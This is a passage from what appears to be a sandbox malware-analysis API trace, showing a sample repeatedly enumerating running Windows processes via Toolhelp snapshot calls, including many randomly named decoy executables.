dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.926] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.928] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.929] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.930] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.931] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.935] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.936] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.937] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.995] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.002] CloseHandle (hObject=0xc4) returned 1 [0104.002] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0104.006] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.070] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.071] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.073] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.074] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.076] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.077] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.079] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.082] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.085] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.086] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 